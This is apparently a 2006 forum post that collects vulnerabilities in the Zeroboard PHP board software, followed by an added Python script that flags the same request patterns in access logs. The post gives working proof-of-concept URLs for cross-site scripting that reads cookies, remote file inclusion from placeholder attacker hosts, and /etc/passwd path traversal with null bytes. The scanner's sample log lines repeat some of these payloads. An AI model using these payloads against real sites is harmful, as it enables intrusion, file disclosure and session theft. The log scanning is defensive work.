Zeroboard vulnerability roundup
Posted 2006-09-25, views 49,851
■ Cross-site scripting vulnerability (2005.02.19)
The following proof of concept examples are available:
http://www.example.com/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/zboard.php?id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/skin/dir/view_image.php?filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/zboard.php?id=link&page=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

■ Print_Category.PHP remote file include vulnerability (2005.01.13)
http://www.example.com/[zeroboard]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/

■ DIR parameter remote file include vulnerability (2005.01.13)
The following proof of concept examples are available:
http://www.example.com/skin/zero_vote/error.php?dir=http://[ATTACKER]
http://www.example.com/skin/zero_vote/login.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/setup.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/ask_password.php?dir=http://[attacker]/

■ Multiple file disclosure vulnerabilities (2005.01.13)
http://www.example.com/_head.php?_zb_path=../../../../../etc/passwd%00
http://www.example.com/include/write.php?dir=../../../../../etc/passwd%00
http://www.example.com/outlogin.php?_zb_path=../../../../../etc/passwd%00

■ Multiple remote script injection and cross-site scripting vulnerabilities (2004.12.24)
http://www.example.com/outlogin.php?_zb_path=ftp://[attacker]/pub/
http://www.example.com/include/write.php?dir=http://[attacker]/
http://www.example.com/check_user_id.php?user_id=
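
For defenders reviewing web server logs, the request shapes listed above can be matched by parameter rather than by exact URL. The following is an added example, not part of the original post: it flags requests where `dir` or `_zb_path` carries a remote scheme, a traversal sequence or a null byte, and any parameter carrying a script tag. The log lines, addresses and the `attacker.example` host are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the PoCs listed above use to carry an include path.
INCLUDE_PARAMS = {"dir", "_zb_path"}
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftp)://", re.I)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the sorted finding labels for one request target (path + query)."""
    findings = set()
    # parse_qsl percent-decodes values, so %3Cscript%3E and %00 are seen decoded.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in INCLUDE_PARAMS:
            if REMOTE_SCHEME.match(value):
                findings.add("remote-include")
            if "../" in value or "..\\" in value:
                findings.add("path-traversal")
            if "\x00" in value:
                findings.add("null-byte")
        if SCRIPT_TAG.search(value):
            findings.add("xss")
    return sorted(findings)

def scan(log_lines):
    """Return (target, findings) for each access-log line that matches a rule."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        found = classify(m.group(1)) if m else []
        if found:
            hits.append((m.group(1), found))
    return hits

# Constructed sample lines in common log format, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2006:10:00:00 +0900] "GET /zboard.php?id=gallery&page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Sep/2006:10:00:05 +0900] "GET /skin/zero_vote/login.php?dir=http://attacker.example/ HTTP/1.1" 200 312',
    '192.0.2.44 - - [25/Sep/2006:10:00:09 +0900] "GET /_head.php?_zb_path=../../../../../etc/passwd%00 HTTP/1.1" 200 980',
    '192.0.2.45 - - [25/Sep/2006:10:01:12 +0900] "GET /zboard.php?id=link&page=x%27%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for target, found in scan(SAMPLE_LOG):
        print(", ".join(found), target)
```

Only the query string is inspected, so values sent in a POST body will not appear in an access log and need a request-level filter instead.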